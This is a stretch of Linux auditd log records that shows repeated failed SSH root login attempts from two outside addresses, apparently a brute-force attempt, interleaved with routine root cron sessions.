+type=USER_LOGIN msg=audit(1551485929.570:408): pid=17159 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=223.111.139.247 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485931.634:409): pid=17159 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=223.111.139.247 addr=223.111.139.247 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485931.634:410): pid=17159 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=223.111.139.247 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485936.602:411): pid=17169 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=223.111.139.247 addr=223.111.139.247 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485936.602:412): pid=17169 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=223.111.139.247 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485938.846:413): pid=17169 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=223.111.139.247 addr=223.111.139.247 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485938.846:414): pid=17169 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=223.111.139.247 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485940.838:415): pid=17169 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=223.111.139.247 addr=223.111.139.247 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485940.838:416): pid=17169 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=223.111.139.247 terminal=sshd res=failed'
+type=USER_ACCT msg=audit(1551485941.102:417): pid=17176 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:accounting acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=CRED_ACQ msg=audit(1551485941.102:418): pid=17176 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:setcred acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=LOGIN msg=audit(1551485941.102:419): pid=17176 uid=0 subj==unconfined old-auid=4294967295 auid=0 tty=(none) old-ses=4294967295 ses=254 res=1
+type=USER_START msg=audit(1551485941.102:420): pid=17176 uid=0 auid=0 ses=254 subj==unconfined msg='op=PAM:session_open acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=CRED_DISP msg=audit(1551485941.106:421): pid=17176 uid=0 auid=0 ses=254 subj==unconfined msg='op=PAM:setcred acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=USER_END msg=audit(1551485941.106:422): pid=17176 uid=0 auid=0 ses=254 subj==unconfined msg='op=PAM:session_close acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=USER_AUTH msg=audit(1551485946.562:423): pid=17182 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=223.111.139.247 addr=223.111.139.247 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485946.562:424): pid=17182 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=223.111.139.247 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485949.322:425): pid=17182 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=223.111.139.247 addr=223.111.139.247 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485949.322:426): pid=17182 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=223.111.139.247 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485951.998:427): pid=17182 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=223.111.139.247 addr=223.111.139.247 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485951.998:428): pid=17182 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=223.111.139.247 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485956.658:429): pid=17192 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=223.111.139.247 addr=223.111.139.247 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485956.658:430): pid=17192 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=223.111.139.247 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485959.310:431): pid=17192 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=223.111.139.247 addr=223.111.139.247 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485959.310:432): pid=17192 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=223.111.139.247 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485961.382:433): pid=17192 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=223.111.139.247 addr=223.111.139.247 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485961.382:434): pid=17192 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=223.111.139.247 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485965.654:435): pid=17210 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=223.111.139.247 addr=223.111.139.247 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485965.654:436): pid=17210 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=223.111.139.247 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485967.918:437): pid=17210 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=223.111.139.247 addr=223.111.139.247 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485967.918:438): pid=17210 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=223.111.139.247 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485970.898:439): pid=17210 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=223.111.139.247 addr=223.111.139.247 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485970.898:440): pid=17210 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=223.111.139.247 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485975.882:441): pid=17220 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=223.111.139.247 addr=223.111.139.247 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485975.882:442): pid=17220 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=223.111.139.247 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485978.566:443): pid=17220 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=223.111.139.247 addr=223.111.139.247 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485978.566:444): pid=17220 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=223.111.139.247 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485980.914:445): pid=17220 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=223.111.139.247 addr=223.111.139.247 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485980.914:446): pid=17220 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=223.111.139.247 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485988.530:447): pid=17232 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=223.111.139.247 addr=223.111.139.247 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485988.530:448): pid=17232 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=223.111.139.247 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485991.674:449): pid=17232 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=223.111.139.247 addr=223.111.139.247 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485991.674:450): pid=17232 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=223.111.139.247 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485994.834:451): pid=17232 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=223.111.139.247 addr=223.111.139.247 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485994.834:452): pid=17232 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=223.111.139.247 terminal=sshd res=failed'
+type=USER_ACCT msg=audit(1551486001.110:453): pid=17249 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:accounting acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=CRED_ACQ msg=audit(1551486001.110:454): pid=17249 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:setcred acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=LOGIN msg=audit(1551486001.110:455): pid=17249 uid=0 subj==unconfined old-auid=4294967295 auid=0 tty=(none) old-ses=4294967295 ses=255 res=1
+type=USER_ACCT msg=audit(1551486001.110:456): pid=17250 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:accounting acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=CRED_ACQ msg=audit(1551486001.110:457): pid=17250 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:setcred acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=LOGIN msg=audit(1551486001.110:458): pid=17250 uid=0 subj==unconfined old-auid=4294967295 auid=0 tty=(none) old-ses=4294967295 ses=256 res=1
+type=USER_START msg=audit(1551486001.110:459): pid=17250 uid=0 auid=0 ses=256 subj==unconfined msg='op=PAM:session_open acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=USER_START msg=audit(1551486001.110:460): pid=17249 uid=0 auid=0 ses=255 subj==unconfined msg='op=PAM:session_open acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=CRED_DISP msg=audit(1551486001.110:461): pid=17250 uid=0 auid=0 ses=256 subj==unconfined msg='op=PAM:setcred acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=USER_END msg=audit(1551486001.110:462): pid=17250 uid=0 auid=0 ses=256 subj==unconfined msg='op=PAM:session_close acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=CRED_DISP msg=audit(1551486001.130:463): pid=17249 uid=0 auid=0 ses=255 subj==unconfined msg='op=PAM:setcred acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=USER_END msg=audit(1551486001.130:464): pid=17249 uid=0 auid=0 ses=255 subj==unconfined msg='op=PAM:session_close acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=USER_AUTH msg=audit(1551486003.082:465): pid=17247 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=223.111.139.247 addr=223.111.139.247 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551486003.082:466): pid=17247 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=223.111.139.247 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551486006.026:467): pid=17247 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=223.111.139.247 addr=223.111.139.247 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551486006.026:468): pid=17247 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=223.111.139.247 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551486008.578:469): pid=17247 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=223.111.139.247 addr=223.111.139.247 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551486008.578:470): pid=17247 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=223.111.139.247 terminal=sshd res=failed'
+type=USER_ACCT msg=audit(1551486061.130:471): pid=17312 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:accounting acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=CRED_ACQ msg=audit(1551486061.130:472): pid=17312 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:setcred acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=LOGIN msg=audit(1551486061.130:473): pid=17312 uid=0 subj==unconfined old-auid=4294967295 auid=0 tty=(none) old-ses=4294967295 ses=257 res=1
+type=USER_START msg=audit(1551486061.130:474): pid=17312 uid=0 auid=0 ses=257 subj==unconfined msg='op=PAM:session_open acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=CRED_DISP msg=audit(1551486061.134:475): pid=17312 uid=0 auid=0 ses=257 subj==unconfined msg='op=PAM:setcred acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=USER_END msg=audit(1551486061.134:476): pid=17312 uid=0 auid=0 ses=257 subj==unconfined msg='op=PAM:session_close acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=USER_ACCT msg=audit(1551486121.139:477): pid=17376 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:accounting acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=CRED_ACQ msg=audit(1551486121.139:478): pid=17376 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:setcred acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=LOGIN msg=audit(1551486121.139:479): pid=17376 uid=0 subj==unconfined old-auid=4294967295 auid=0 tty=(none) old-ses=4294967295 ses=258 res=1
+type=USER_START msg=audit(1551486121.139:480): pid=17376 uid=0 auid=0 ses=258 subj==unconfined msg='op=PAM:session_open acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=CRED_DISP msg=audit(1551486121.139:481): pid=17376 uid=0 auid=0 ses=258 subj==unconfined msg='op=PAM:setcred acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=USER_END msg=audit(1551486121.139:482): pid=17376 uid=0 auid=0 ses=258 subj==unconfined msg='op=PAM:session_close acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=USER_ACCT msg=audit(1551486181.143:483): pid=17435 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:accounting acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=CRED_ACQ msg=audit(1551486181.143:484): pid=17435 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:setcred acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=LOGIN msg=audit(1551486181.143:485): pid=17435 uid=0 subj==unconfined old-auid=4294967295 auid=0 tty=(none) old-ses=4294967295 ses=259 res=1
+type=USER_START msg=audit(1551486181.143:486): pid=17435 uid=0 auid=0 ses=259 subj==unconfined msg='op=PAM:session_open acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=CRED_DISP msg=audit(1551486181.143:487): pid=17435 uid=0 auid=0 ses=259 subj==unconfined msg='op=PAM:setcred acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=USER_END msg=audit(1551486181.143:488): pid=17435 uid=0 auid=0 ses=259 subj==unconfined msg='op=PAM:session_close acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=USER_ACCT msg=audit(1551486241.147:489): pid=17494 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:accounting acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=CRED_ACQ msg=audit(1551486241.147:490): pid=17494 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:setcred acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=LOGIN msg=audit(1551486241.147:491): pid=17494 uid=0 subj==unconfined old-auid=4294967295 auid=0 tty=(none) old-ses=4294967295 ses=260 res=1
+type=USER_START msg=audit(1551486241.147:492): pid=17494 uid=0 auid=0 ses=260 subj==unconfined msg='op=PAM:session_open acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=CRED_DISP msg=audit(1551486241.151:493): pid=17494 uid=0 auid=0 ses=260 subj==unconfined msg='op=PAM:setcred acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=USER_END msg=audit(1551486241.151:494): pid=17494 uid=0 auid=0 ses=260 subj==unconfined msg='op=PAM:session_close acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=USER_ACCT msg=audit(1551486301.155:495): pid=17554 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:accounting acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=CRED_ACQ msg=audit(1551486301.155:496): pid=17554 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:setcred acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=LOGIN msg=audit(1551486301.155:497): pid=17554 uid=0 subj==unconfined old-auid=4294967295 auid=0 tty=(none) old-ses=4294967295 ses=261 res=1
+type=USER_START msg=audit(1551486301.155:498): pid=17554 uid=0 auid=0 ses=261 subj==unconfined msg='op=PAM:session_open acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=USER_ACCT msg=audit(1551486301.155:499): pid=17553 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:accounting acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=CRED_ACQ msg=audit(1551486301.155:500): pid=17553 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:setcred acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=LOGIN msg=audit(1551486301.155:501): pid=17553 uid=0 subj==unconfined old-auid=4294967295 auid=0 tty=(none) old-ses=4294967295 ses=262 res=1
+type=USER_START msg=audit(1551486301.155:502): pid=17553 uid=0 auid=0 ses=262 subj==unconfined msg='op=PAM:session_open acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=CRED_DISP msg=audit(1551486301.155:503): pid=17554 uid=0 auid=0 ses=261 subj==unconfined msg='op=PAM:setcred acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=USER_END msg=audit(1551486301.155:504): pid=17554 uid=0 auid=0 ses=261 subj==unconfined msg='op=PAM:session_close acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=CRED_DISP msg=audit(1551486301.175:505): pid=17553 uid=0 auid=0 ses=262 subj==unconfined msg='op=PAM:setcred acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=USER_END msg=audit(1551486301.175:506): pid=17553 uid=0 auid=0 ses=262 subj==unconfined msg='op=PAM:session_close acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=USER_ACCT msg=audit(1551486361.176:507): pid=17615 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:accounting acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=CRED_ACQ msg=audit(1551486361.176:508): pid=17615 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:setcred acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=LOGIN msg=audit(1551486361.176:509): pid=17615 uid=0 subj==unconfined old-auid=4294967295 auid=0 tty=(none) old-ses=4294967295 ses=263 res=1
+type=USER_START msg=audit(1551486361.180:510): pid=17615 uid=0 auid=0 ses=263 subj==unconfined msg='op=PAM:session_open acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=CRED_DISP msg=audit(1551486361.180:511): pid=17615 uid=0 auid=0 ses=263 subj==unconfined msg='op=PAM:setcred acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=USER_END msg=audit(1551486361.180:512): pid=17615 uid=0 auid=0 ses=263 subj==unconfined msg='op=PAM:session_close acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=USER_ACCT msg=audit(1551486421.184:513): pid=17674 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:accounting acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=CRED_ACQ msg=audit(1551486421.184:514): pid=17674 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:setcred acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=LOGIN msg=audit(1551486421.184:515): pid=17674 uid=0 subj==unconfined old-auid=4294967295 auid=0 tty=(none) old-ses=4294967295 ses=264 res=1
+type=USER_START msg=audit(1551486421.184:516): pid=17674 uid=0 auid=0 ses=264 subj==unconfined msg='op=PAM:session_open acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=CRED_DISP msg=audit(1551486421.184:517): pid=17674 uid=0 auid=0 ses=264 subj==unconfined msg='op=PAM:setcred acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=USER_END msg=audit(1551486421.184:518): pid=17674 uid=0 auid=0 ses=264 subj==unconfined msg='op=PAM:session_close acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=USER_ACCT msg=audit(1551486481.188:519): pid=17738 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:accounting acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=CRED_ACQ msg=audit(1551486481.188:520): pid=17738 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:setcred acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=LOGIN msg=audit(1551486481.188:521): pid=17738 uid=0 subj==unconfined old-auid=4294967295 auid=0 tty=(none) old-ses=4294967295 ses=265 res=1
+type=USER_START msg=audit(1551486481.188:522): pid=17738 uid=0 auid=0 ses=265 subj==unconfined msg='op=PAM:session_open acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=CRED_DISP msg=audit(1551486481.192:523): pid=17738 uid=0 auid=0 ses=265 subj==unconfined msg='op=PAM:setcred acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=USER_END msg=audit(1551486481.192:524): pid=17738 uid=0 auid=0 ses=265 subj==unconfined msg='op=PAM:session_close acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=USER_AUTH msg=audit(1551486511.960:525): pid=17773 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=93.47.130.237 addr=93.47.130.237 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551486511.960:526): pid=17773 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=93.47.130.237 terminal=sshd res=failed'
+type=USER_ACCT msg=audit(1551486541.193:527): pid=17801 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:accounting acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=CRED_ACQ msg=audit(1551486541.193:528): pid=17801 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:setcred acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=LOGIN msg=audit(1551486541.193:529): pid=17801 uid=0 subj==unconfined old-auid=4294967295 auid=0 tty=(none) old-ses=4294967295 ses=266 res=1
+type=USER_START msg=audit(1551486541.193:530): pid=17801 uid=0 auid=0 ses=266 subj==unconfined msg='op=PAM:session_open acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=CRED_DISP msg=audit(1551486541.197:531): pid=17801 uid=0 auid=0 ses=266 subj==unconfined msg='op=PAM:setcred acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=USER_END msg=audit(1551486541.197:532): pid=17801 uid=0 auid=0 ses=266 subj==unconfined msg='op=PAM:session_close acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=USER_ACCT msg=audit(1551486601.201:533): pid=17860 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:accounting acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=USER_ACCT msg=audit(1551486601.201:534): pid=17863 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:accounting acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=CRED_ACQ msg=audit(1551486601.201:535): pid=17863 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:setcred acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=LOGIN msg=audit(1551486601.201:536): pid=17863 uid=0 subj==unconfined old-auid=4294967295 auid=0 tty=(none) old-ses=4294967295 ses=267 res=1
+type=USER_START msg=audit(1551486601.201:537): pid=17863 uid=0 auid=0 ses=267 subj==unconfined msg='op=PAM:session_open acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=USER_ACCT msg=audit(1551486601.201:538): pid=17861 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:accounting acct="omsagent" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=CRED_ACQ msg=audit(1551486601.201:539): pid=17860 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:setcred acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=LOGIN msg=audit(1551486601.201:540): pid=17860 uid=0 subj==unconfined old-auid=4294967295 auid=0 tty=(none) old-ses=4294967295 ses=268 res=1
+type=USER_START msg=audit(1551486601.205:541): pid=17860 uid=0 auid=0 ses=268 subj==unconfined msg='op=PAM:session_open acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=CRED_ACQ msg=audit(1551486601.205:542): pid=17861 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:setcred acct="omsagent" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=LOGIN msg=audit(1551486601.205:543): pid=17861 uid=0 subj==unconfined old-auid=4294967295 auid=998 tty=(none) old-ses=4294967295 ses=269 res=1
+type=USER_ACCT msg=audit(1551486601.205:544): pid=17862 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:accounting acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=CRED_ACQ msg=audit(1551486601.205:545): pid=17862 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:setcred acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
